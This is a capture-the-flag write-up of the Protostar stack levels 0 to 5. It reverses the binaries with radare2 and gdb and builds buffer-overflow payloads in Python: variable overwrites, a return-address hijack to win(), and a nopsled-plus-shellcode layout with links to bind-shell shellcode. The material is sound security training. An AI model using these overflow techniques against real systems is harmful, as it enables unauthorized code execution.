These exercises can be found at https://exploit-exercises.com/protostar/
To spice things up I decided to download the binaries to a local box and reverse engineer them rather than looking at the source code that is provided on the webpage.
I'll be using pwntools to write the exploits. This is an awesome Python exploitation library that can be found at https://github.com/Gallopsled/pwntools. I'll be using radare2 for reversing the binaries and gdb for debugging. Radare can be found at http://radare.org.
#Stack0
Loading the binary in radare, we get the following structure.
.----------------------------------------------.
| [0x80483f4] ;[c] |
| ;-- main: |
| (fcn) sym.main 65 |
| sym.main (); |
| ; var int local_1ch @ esp+0x1c |
| ; var int local_5ch @ esp+0x5c |
| push ebp |
| mov ebp, esp |
| and esp, 0xfffffff0 |
| sub esp, 0x60 |
| mov dword [esp + local_5ch], 0 |
| lea eax, [esp + local_1ch] |
| mov dword [esp], eax |
| call sym.imp.gets ;[a]; char*gets(char *s); |
| mov eax, dword [esp + local_5ch] |
| test eax, eax |
| je 0x8048427 ;[b] |
`----------------------------------------------'
f t
.---------------------------------------' '-------------------------.
| |
| |
.---------------------------------------------------------------. .---------------------------------------------------.
| 0x8048419 ;[f] | | 0x8048427 ;[b] |
| mov dword [esp], str.you_have_changed_the__modified__variable | | mov dword [esp], str.Try_again_ |
| call sym.imp.puts ;[d]; int puts(const char *s); | | call sym.imp.puts ;[d]; int puts(const char *s); |
| jmp 0x8048433 ;[e] | `---------------------------------------------------'
`---------------------------------------------------------------' v
v |
'----------------------------------------------------.----------------'
|
|
.--------------------.
| 0x8048433 ;[e] |
| leave |
| ret |
`--------------------'
Let's walk through the application to get an understanding of what it does. The program first sets up main's stack frame with the usual prologue: it pushes the old base pointer (ebp) onto the stack and then copies the stack pointer (esp) into ebp, so that ebp marks the base of the new frame. The and instruction then aligns esp to a 16-byte boundary.
It then reserves 96 bytes on the stack by subtracting 0x60 from esp. We note that radare recognizes two local variables, one at esp+0x1c and one at esp+0x5c.
The program then zeroes out the variable located at esp+0x5c. This is most likely equivalent to "int local_var = 0;" in C. It then loads the effective address of the variable at esp+0x1c into eax, which is a pointer to a buffer, and stores that pointer at the top of the stack as the argument to gets(). After gets() returns, the value at esp+0x5c is loaded into eax for the comparison that follows.
We can provide input to the program through the gets() function. Here lies the vulnerability of the program: gets() won't check how long the input that we provide is. In the man page of gets we can read the following: "Never use gets(). Because it is impossible to tell without knowing the data in advance how many characters gets() will read, and because gets() will continue to store characters past the end of the buffer, it is extremely dangerous to use."
The test instruction then performs a bitwise AND of eax with itself and sets the flags according to the result. If eax is 0, the result is 0, the zero flag is set, and the je jumps to the "Try again" branch. If eax holds anything but 0, the jump is not taken and execution falls through to the code block that completes the challenge. Since the buffer starts at esp+0x1c and the variable sits at esp+0x5c, writing more than 0x40 (64) bytes into the buffer overwrites the variable.
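The overflow described above can be sketched as a small payload builder. This is only a minimal sketch using the Python standard library instead of pwntools; the two offsets are taken from the disassembly, while the filler byte and the single overwrite byte are arbitrary choices of mine.

```python
# Sketch: build an input for this level that overflows the buffer at
# esp+0x1c into the integer at esp+0x5c. Offsets come from the radare
# output; the filler and overwrite bytes are arbitrary assumptions.
BUF_OFFSET = 0x1c   # start of the buffer handed to gets()
VAR_OFFSET = 0x5c   # the variable main() tests after gets() returns

padding_len = VAR_OFFSET - BUF_OFFSET   # 0x40 == 64 bytes of filler
payload = b"A" * padding_len + b"B"     # one non-zero byte past the buffer

print(padding_len)   # 64
print(len(payload))  # 65
```

Any non-zero byte works for the overwrite as long as the payload contains no newline, since gets() stops reading at the first newline.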
#Stack1
This binary takes its input as a command-line argument. When disassembling the program I first note that it checks that an argument was specified. If argc is less than 2, we get the message "please specify an argument".
Further down the execution chain we get to the more juicy stuff.
| lea eax, [esp + local_1ch] |
| mov dword [esp], eax |
| call sym.imp.strcpy ;[e]; char *strcpy(char *dest, const char *src); |
| mov eax, dword [esp + local_5ch] |
| cmp eax, 0x61626364 |
| jne 0x80484c0 ;[f] |
`-----------------------------------------------------------------------'
f t
.----------------------------------------' '--------------------------------------.
| |
| |
.-----------------------------------------------------------------------------. .------------------------------------------------------------.
| 0x80484b2 ;[i] | | 0x80484c0 ;[f] |
| mov dword [esp], str.you_have_correctly_got_the_variable_to_the_right_value | | mov edx, dword [esp + local_5ch] |
| call sym.imp.puts ;[g]; int puts(const char *s); | | mov eax, str.Try_again__you_got_0x_08x_n |
| jmp 0x80484d5 ;[h] | | mov dword [esp + local_4h], edx |
`-----------------------------------------------------------------------------' | mov dword [esp], eax |
| call sym.imp.printf ;[j]; int printf(const char *format); |
`------------------------------------------------------------'
We notice a call to strcpy(), which is a vulnerable function that does not perform any bounds checks. This means that we can write past the end of the buffer that the function stores its data in. The application then compares the value in eax with the hex value 0x61626364, which translates to "abcd" in ASCII. Interesting: if we can overwrite the variable after the buffer with that value, we complete the challenge.
To confirm the offset needed to overwrite the local variable, we can either send a cyclic pattern to the application and check how far into our buffer the target value is located, or we can look at the disassembled code. We note that 0x5c - 0x1c is 0x40, which is equal to 64. So if we create a buffer of 64 bytes followed by the value 0x61626364, we should be at the right spot. Remember to write the value in little-endian byte order before sending it to the program, so the bytes appear in memory as "dcba".
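The offset arithmetic and the little-endian conversion can be sketched as follows. This is a minimal sketch using the standard library's struct module; in pwntools, p32() performs the same packing. The filler byte is an arbitrary choice.

```python
import struct

# Offsets and target value as read from the disassembly.
BUF_OFFSET = 0x1c        # destination buffer of strcpy()
VAR_OFFSET = 0x5c        # variable compared against the target
TARGET = 0x61626364      # value checked by the cmp instruction

padding = b"A" * (VAR_OFFSET - BUF_OFFSET)  # 64 bytes of filler
value = struct.pack("<I", TARGET)           # 32-bit little-endian encoding
payload = padding + value

print(len(padding))  # 64
print(value)         # b'dcba'
```

The resulting bytes would be passed to the binary as its first command-line argument.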
#Stack2
When running the program without any arguments we get a message telling us to set an environment variable called "GREENIE". In the disassembly we see a call to the getenv() function and then a comparison that checks whether this variable is set.
As seen below, the program then sets up some local variables and basically copies the value from the GREENIE environment variable into another local var, most likely a buffer. Then there is a compare between the value of the local_58h variable and the value "0xd0a0d0a". Like in the previous levels, if we can overwrite the variable with that value we are home safe.
Snipped disassembly:
.-----------------------------------------------------------------------.
| 0x80484c8 ;[b] |
| mov dword [esp + local_58h], 0 |
| mov eax, dword [esp + local_5ch] |
| mov dword [esp + local_4h], eax |
| lea eax, [esp + local_18h] |
| mov dword [esp], eax |
| call sym.imp.strcpy ;[f]; char *strcpy(char *dest, const char *src); |
| mov eax, dword [esp + local_58h] |
| cmp eax, 0xd0a0d0a |
| jne 0x80484fd ;[g] |
`-----------------------------------------------------------------------'
f t
.-----------------------------' '-----------------------------------.
| |
| |
.---------------------------------------------------------------. .------------------------------------------------------------.
| 0x80484ef ;[j] | | 0x80484fd ;[g] |
| mov dword [esp], str.you_have_correctly_modified_the_variable | | mov edx, dword [esp + local_58h] |
| call sym.imp.puts ;[h]; int puts(const char *s); | | mov eax, str.Try_again__you_got_0x_08x_n |
| jmp 0x8048512 ;[i] | | mov dword [esp + local_4h], edx |
`---------------------------------------------------------------' | mov dword [esp], eax |
| call sym.imp.printf ;[k]; int printf(const char *format); |
`------------------------------------------------------------'
Computing the offset as in the previous levels (0x58 - 0x18 = 0x40) shows that it is the same: 64 bytes. If we create a payload with 64 bytes of junk followed by the value 0x0d0a0d0a in little-endian byte order and store it in the GREENIE variable, we complete the challenge.
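A minimal sketch of how the environment variable could be prepared is shown below. It uses only the Python standard library; the helper run_with_greenie() and the binary path it takes are hypothetical and are not called here, since they depend on where the binary lives on your box.

```python
import struct
import subprocess

ENV_NAME = b"GREENIE"
TARGET = 0x0d0a0d0a                       # value checked by the cmp instruction

padding = b"A" * (0x58 - 0x18)            # 64 bytes between buffer and variable
value = struct.pack("<I", TARGET)         # little-endian: b"\n\r\n\r"
payload = padding + value

# On POSIX systems the environment mapping may contain bytes.
env = {ENV_NAME: payload}

def run_with_greenie(binary_path):
    """Hypothetical helper: run the level's binary with GREENIE set."""
    return subprocess.run([binary_path], env=env)

print(value)  # b'\n\r\n\r'
```

Building the variable from a script avoids having to type the carriage return and newline bytes in a shell by hand.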
#Stack3
The description for this level says that we need to locate a function called win() and then redirect the execution flow of the program to that function.
To find the address of the win() function we can simply use the afl command in radare to list all functions:
[0x08048370]> afl
0x080482e0 3 48 sym._init
0x08048320 1 6 loc.imp.__gmon_start__
0x08048330 1 6 sym.imp.gets
0x08048340 1 6 sym.imp.__libc_start_main
0x08048350 1 6 sym.imp.printf
0x08048360 1 6 sym.imp.puts
0x08048370 1 33 entry0
0x080483a0 6 85 sym.__do_global_dtors_aux
0x08048400 4 35 sym.frame_dummy
0x08048424 1 20 sym.win
0x08048438 3 65 sym.main
0x08048480 1 5 sym.__libc_csu_fini
0x08048490 4 90 sym.__libc_csu_init
0x080484ea 1 4 sym.__i686.get_pc_thunk.bx
0x080484f0 4 42 sym.__do_global_ctors_aux
0x0804851c 1 28 sym._fini
The win() function is located at 0x08048424. A quick disassembly of the function shows that it prints the string "code flow successfully changed" using the puts() function.
mov dword [esp], str.code_flow_successfully_changed ;
call sym.imp.puts
So we can assume that the application will somehow call the address we supply in our buffer (if we hit the offset correctly). Let's examine the main function:
.----------------------------------------------.
| [0x8048438] ;[c] |
| ;-- main: |
| (fcn) sym.main 65 |
| sym.main (int arg_5ch); |
| ; var int local_4h @ esp+0x4 |
| ; var int local_1ch @ esp+0x1c |
| ; arg int arg_5ch @ esp+0x5c |
| push ebp |
| mov ebp, esp |
| and esp, 0xfffffff0 |
| sub esp, 0x60 |
| mov dword [esp + arg_5ch], 0 |
| lea eax, [esp + local_1ch] |
| mov dword [esp], eax |
| call sym.imp.gets ;[a]; char*gets(char *s); |
| cmp dword [esp + arg_5ch], 0 |
| je 0x8048477 ;[b] |
`----------------------------------------------'
f t
.------------------------' '--------------------------------.
| |
| |
.------------------------------------------------------------. |
| 0x804845c ;[e] | |
| mov eax, str.calling_function_pointer__jumping_to_0x_08x_n | |
| mov edx, dword [esp + arg_5ch] | |
| mov dword [esp + local_4h], edx | |
| mov dword [esp], eax | |
| call sym.imp.printf ;[d]; int printf(const char *format); | |
| mov eax, dword [esp + arg_5ch] | |
| call eax | |
`------------------------------------------------------------' |
v |
'-------------------------------------. .-------------------'
| |
| |
.--------------------.
| 0x8048477 ;[b] |
| leave |
| ret |
`--------------------'
We have the usual setup of the stack frame, and we note a couple of local variables. The binary then calls gets(), which is where we can supply our input. As I explained in the first level, gets() is a very dangerous function to use.
A comparison is then made to check whether the variable at esp+0x5c is still zero, that is, whether our input overflowed into it. If it is zero, the program jumps straight to the leave and ret instructions. Otherwise a format string and the value of the variable are placed on the stack and printf() is called. After that, the value we supplied is moved into eax and called as a function address.
So all we need to do is craft a payload that fills the 64-byte gap between the buffer (esp+0x1c) and the variable (esp+0x5c) and then writes the address of win(), which main then calls.
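The payload for this level can be sketched like this. It is a minimal sketch with the standard library's struct module; the address is the one afl reported for sym.win above, and the filler byte is an arbitrary choice.

```python
import struct

WIN_ADDR = 0x08048424                 # sym.win as listed by afl
padding = b"A" * (0x5c - 0x1c)        # 64 bytes from the buffer to the pointer

# The function pointer is read as a 32-bit little-endian value.
payload = padding + struct.pack("<I", WIN_ADDR)

print(payload[-4:])  # b'$\x84\x04\x08'
```

The bytes are sent to the program on stdin, followed by a newline so that gets() returns.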
#Stack4
The goal in this level is the same as in the previous one: we want to shift the execution flow of the program to the win() function. This time, however, we want to overwrite the return address of the function and gain control over eip, rather than having the program itself call the address we supply as in the last level. This is to mimic how an actual "direct ret overwrite" buffer overflow would work.
If we supply a large input to the application we get a segmentation fault. Interesting, this suggests that the application may be vulnerable to some kind of overflow. Let's see if we can control eip. When supplying a lot of capital A's (0x41) to the program attached to gdb, we note that eip contains the value 0x41414141. Bingo.
When debugging a program I find radare rather difficult to use, so I tend to use gdb instead.
To figure out the offset we can use the cyclic pattern technique mentioned earlier. Then it's only a matter of constructing the payload as in the previous level, using the address of the win() function in this binary.
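The cyclic pattern technique can be sketched without any external tooling. The code below is a minimal stand-in for what pwntools' cyclic helpers do, not their implementation: it generates a Metasploit-style "Aa0Aa1Aa2..." pattern and looks up the value found in eip. The crash is simulated rather than read from gdb, and WIN_ADDR_PLACEHOLDER is a made-up value that must be replaced with the address afl reports for this level's binary.

```python
import string
import struct

def make_pattern(length):
    """Return a non-repeating 'Aa0Aa1Aa2...' pattern of the given length."""
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length].encode()
    return "".join(chunks)[:length].encode()

def find_offset(pattern, eip_value):
    """Find where the 4 bytes that landed in eip sit inside the pattern."""
    return pattern.find(struct.pack("<I", eip_value))

def build_payload(offset, target_addr):
    """Filler up to the saved return address, then the new return address."""
    return b"A" * offset + struct.pack("<I", target_addr)

pattern = make_pattern(128)

# Simulated crash: pretend gdb showed eip loaded from pattern bytes 76..79.
simulated_eip = struct.unpack("<I", pattern[76:80])[0]
offset = find_offset(pattern, simulated_eip)
print(offset)  # 76

WIN_ADDR_PLACEHOLDER = 0xdeadbeef  # hypothetical, not the real address
payload = build_payload(offset, WIN_ADDR_PLACEHOLDER)
```

In a real run the pattern is fed to the program under gdb, and the eip value from the crash is passed to find_offset().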
#Stack5
This is where things get more interesting, because we will now introduce shellcode into our exploit.
Disassembling the binary shows us that it is very basic. The only thing it does is take input through gets().
.----------------------------------------------.
| [0x80483c4] ;[b] |
| ;-- main: |
| (fcn) sym.main 23 |
| sym.main (); |
| ; var int local_10h @ esp+0x10 |
| push ebp |
| mov ebp, esp |
| and esp, 0xfffffff0 |
| sub esp, 0x50 |
| lea eax, [esp + local_10h] |
| mov dword [esp], eax |
| call sym.imp.gets ;[a]; char*gets(char *s); |
| leave |
| ret |
`----------------------------------------------'
As in the previous level, the return address is located 76 bytes into our buffer. This can easily be verified by supplying the previous payload and checking the value of eip in gdb.
So the plan is to send a payload like this:
Junk + ret + nops + shellcode
So we need two things: an address that points into our nopsled, and shellcode that spawns a shell or similar.
Using gdb we find a suitable ret at 0xffffd3e8. This address will land us in the middle of our nopsled.
After experimenting with a couple of execve("/bin/bash") shellcodes I found out that when the input is read with gets(), the spawned shell terminates immediately, since stdin has nothing left to read once the payload has been consumed. There is, however, specialized shellcode out there for this.
Such shellcode can be found here: https://www.exploit-db.com/exploits/13357/
To spawn a local bind shell I used the following shellcode: https://www.exploit-db.com/exploits/14332/
So now we have all the information we need to construct the payload.
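The layout "Junk + ret + nops + shellcode" can be sketched as follows. This is a minimal sketch with the standard library only. The offset and return address are the values found above, the sled length is an assumption of mine, and SHELLCODE is a harmless placeholder (int3 breakpoints) standing in for the real shellcode linked above.

```python
import struct

OFFSET = 76               # bytes of junk before the saved return address
RET_ADDR = 0xffffd3e8     # stack address found in gdb, lands in the nopsled
NOP_SLED_LEN = 64         # assumption: any size that covers RET_ADDR works
SHELLCODE = b"\xcc" * 4   # placeholder only, replace with real shellcode

payload = (
    b"A" * OFFSET                      # junk up to the return address
    + struct.pack("<I", RET_ADDR)      # overwritten return address
    + b"\x90" * NOP_SLED_LEN           # nopsled
    + SHELLCODE                        # payload executed after the sled
)

# gets() stops at a newline, so the payload must not contain one.
assert b"\n" not in payload
print(len(payload))  # 148
```

Stack addresses can differ between a run under gdb and a run outside it, so the return address may need adjusting; a longer sled gives more room for error.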